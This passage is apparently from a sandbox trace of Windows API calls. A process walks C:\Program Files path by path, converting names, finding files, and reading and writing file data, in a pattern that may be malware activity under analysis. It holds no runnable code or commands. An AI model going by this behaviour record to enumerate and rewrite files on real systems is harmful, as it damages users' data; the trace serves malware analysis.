lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\en-US", lpUsedDefaultChar=0x0) returned 43 [0104.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", lpUsedDefaultChar=0x0) returned 60 [0104.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc", lpUsedDefaultChar=0x0) returned 43 [0104.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", lpUsedDefaultChar=0x0) returned 56 [0104.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", lpUsedDefaultChar=0x0) returned 54 [0104.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpUsedDefaultChar=0x0) returned 49 [0104.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0104.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", lpUsedDefaultChar=0x0) returned 66 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", lpUsedDefaultChar=0x0) returned 66 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", lpUsedDefaultChar=0x0) returned 54 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", lpUsedDefaultChar=0x0) returned 55 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", lpUsedDefaultChar=0x0) returned 54 [0104.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", lpUsedDefaultChar=0x0) returned 55 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", lpUsedDefaultChar=0x0) returned 54 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", lpUsedDefaultChar=0x0) returned 55 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll", lpUsedDefaultChar=0x0) returned 56 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll", lpUsedDefaultChar=0x0) returned 56 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll", lpUsedDefaultChar=0x0) returned 55 [0104.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll", lpUsedDefaultChar=0x0) returned 56 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll", lpUsedDefaultChar=0x0) returned 55 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB", lpUsedDefaultChar=0x0) returned 44 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpUsedDefaultChar=0x0) returned 50 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui", lpUsedDefaultChar=0x0) returned 67 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", lpUsedDefaultChar=0x0) returned 67 [0104.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", lpUsedDefaultChar=0x0) returned 67 [0104.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", lpUsedDefaultChar=0x0) returned 66 [0104.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll", lpUsedDefaultChar=0x0) returned 56 [0104.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll", lpUsedDefaultChar=0x0) returned 55 [0104.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll", lpUsedDefaultChar=0x0) returned 56 [0104.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll", lpUsedDefaultChar=0x0) returned 57 [0104.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll", lpUsedDefaultChar=0x0) returned 56 [0104.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", lpUsedDefaultChar=0x0) returned 57 [0104.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", lpUsedDefaultChar=0x0) returned 56 [0104.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", lpUsedDefaultChar=0x0) returned 57 [0104.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpUsedDefaultChar=0x0) returned 57 [0104.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", lpUsedDefaultChar=0x0) returned 57 [0104.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll", lpUsedDefaultChar=0x0) returned 57 [0104.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", lpUsedDefaultChar=0x0) returned 57 [0104.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpUsedDefaultChar=0x0) returned 56 [0104.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpUsedDefaultChar=0x0) returned 56 [0104.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\wab32.dll", lpUsedDefaultChar=0x0) returned 47 [0104.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32res.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\wab32res.dll", lpUsedDefaultChar=0x0) returned 50 [0104.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\desktop.ini", lpUsedDefaultChar=0x0) returned 29 [0104.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer", lpUsedDefaultChar=0x0) returned 35 [0104.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US", lpUsedDefaultChar=0x0) returned 41 [0104.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpUsedDefaultChar=0x0) returned 56 [0104.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpUsedDefaultChar=0x0) returned 58 [0104.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui", lpUsedDefaultChar=0x0) returned 58 [0104.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe", lpUsedDefaultChar=0x0) returned 49 [0104.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll", lpUsedDefaultChar=0x0) returned 46 [0104.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe", lpUsedDefaultChar=0x0) returned 49 [0104.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe", lpUsedDefaultChar=0x0) returned 48 [0104.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ielowutil.exe", lpUsedDefaultChar=0x0) returned 49 [0104.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\IEShims.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\IEShims.dll", lpUsedDefaultChar=0x0) returned 47 [0104.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 48 [0104.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\images", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\images", lpUsedDefaultChar=0x0) returned 42 [0104.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\images\\bing.ico", lpUsedDefaultChar=0x0) returned 51 [0104.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\SIGNUP", lpUsedDefaultChar=0x0) returned 42 [0104.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", lpUsedDefaultChar=0x0) returned 54 [0117.157] GetFileType (hFile=0x41c) returned 0x1 [0121.232] GetLastError () returned 0x0 [0121.232] SetLastError (dwErrCode=0x0) [0121.232] GetLastError () returned 0x0 [0121.232] SetLastError (dwErrCode=0x0) [0121.232] GetLastError () returned 0x0 [0121.232] SetLastError (dwErrCode=0x0) [0121.232] ReadFile (in: hFile=0x41c, lpBuffer=0xa0b58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0xa0b58*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0121.232] GetLastError () returned 0x0 [0121.232] SetLastError (dwErrCode=0x0) [0121.232] GetLastError () returned 0x0 [0121.233] SetLastError (dwErrCode=0x0) [0121.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0121.233] WriteFile (in: hFile=0x288, lpBuffer=0x9db40*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x9db40*, lpNumberOfBytesWritten=0x327ef70*=0xeb0, lpOverlapped=0x0) returned 1 [0121.254] GetLastError () returned 0x0 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3044, dwReserved0=0x1, dwReserved1=0x0, cFileName="EN00222_.WMF", cAlternateFileName="")) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0124.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0124.394] AreFileApisANSI () returned 1 [0124.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", lpUsedDefaultChar=0x0) returned 69 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0124.401] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 